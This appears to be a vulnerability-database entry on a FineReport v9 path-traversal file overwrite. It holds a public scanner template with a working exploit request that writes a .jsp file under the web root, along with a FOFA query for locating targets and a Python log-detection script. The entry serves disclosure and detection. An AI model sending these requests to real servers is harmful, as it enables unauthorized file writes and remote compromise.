fine-report-v9-file-upload: FineReport v9 Arbitrary File Overwrite

Date: 2025-08-01 | Affected software: FineReport v9 | PoC: public

Vulnerability description

FineReport (a business intelligence (BI) and reporting product) is vulnerable to arbitrary file overwrite: the `design_save_svg` handler of `ReportServer` writes the request body to the path given in the `filePath` parameter without confining it to the `chartmapsvg` directory, so `../` sequences let an unauthenticated request place a file under the web root.

PoC code [public]

id: fine-report-v9-file-upload

info:
  name: FineReport v9 Arbitrary File Overwrite
  author: SleepingBag945
  severity: critical
  description: FineReport ( A business intelligence (BI) and reporting software ) is vulnerable to Arbitrary File Overwrite.
  reference:
    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
  metadata:
    max-request: 2
    fofa-query: app="帆软-FineReport"
  tags: finereport,fileupload,intrusive,vuln
variables:
  string: '{{rand_base(8, "abc")}}'
  filename: '{{rand_base(8)}}'

http:
  - raw:
      - |
        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
      - |
        GET /WebReport/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "{{string}}"
# digest: 4b0a00483046022100857f5f53c4fa8e534bc32adba7d39766671cc1c65312d26494df0bdf8bf10d5502210090ab233fca409b42a11106726138c2fe00b033a99a5fef80189f2242f4ddefef:922c64590222798bb761d5b6d8e72950
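As an added detection example (not part of this entry and not the template author's code), the following Python script flags the request pattern shown in the template when it appears in web-server access logs. It assumes a combined-format access log; the sample lines are constructed, not captured traffic.

```python
"""Detection helper: flag FineReport design_save_svg requests whose filePath
escapes the chartmapsvg directory (path traversal) in web access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Request line as it appears in a combined-format access log: "METHOD target HTTP/x.y"
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_svg_save_traversal(request_target: str) -> bool:
    """True when the request hits the svginit/design_save_svg handler with a
    filePath that climbs out of its directory via a '..' segment."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/WebReport/ReportServer"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("op", [""])[0] != "svginit" or qs.get("cmd", [""])[0] != "design_save_svg":
        return False
    file_path = qs.get("filePath", [""])[0]
    return any(segment == ".." for segment in file_path.split("/"))


def scan_access_log(lines):
    """Return (line_number, request_target) for every matching log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQ_RE.search(line)
        if m and is_svg_save_traversal(m.group("target")):
            hits.append((n, m.group("target")))
    return hits


# Constructed sample log lines (not real traffic) for a quick self-check.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /WebReport/ReportServer?op=fs HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Aug/2025:10:00:02 +0000] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/map1.svg HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Aug/2025:10:00:03 +0000] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/x.jsp HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Aug/2025:10:00:04 +0000] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg%2F..%2F..%2FWebReport%2Fy.jsp HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for n, target in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: design_save_svg filePath leaves chartmapsvg -> {target}")
```

A `200` response to a flagged request followed by a `GET` for the same `.jsp` name under `/WebReport/` is the strongest sign the write succeeded and should trigger a file-integrity check of the web root.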
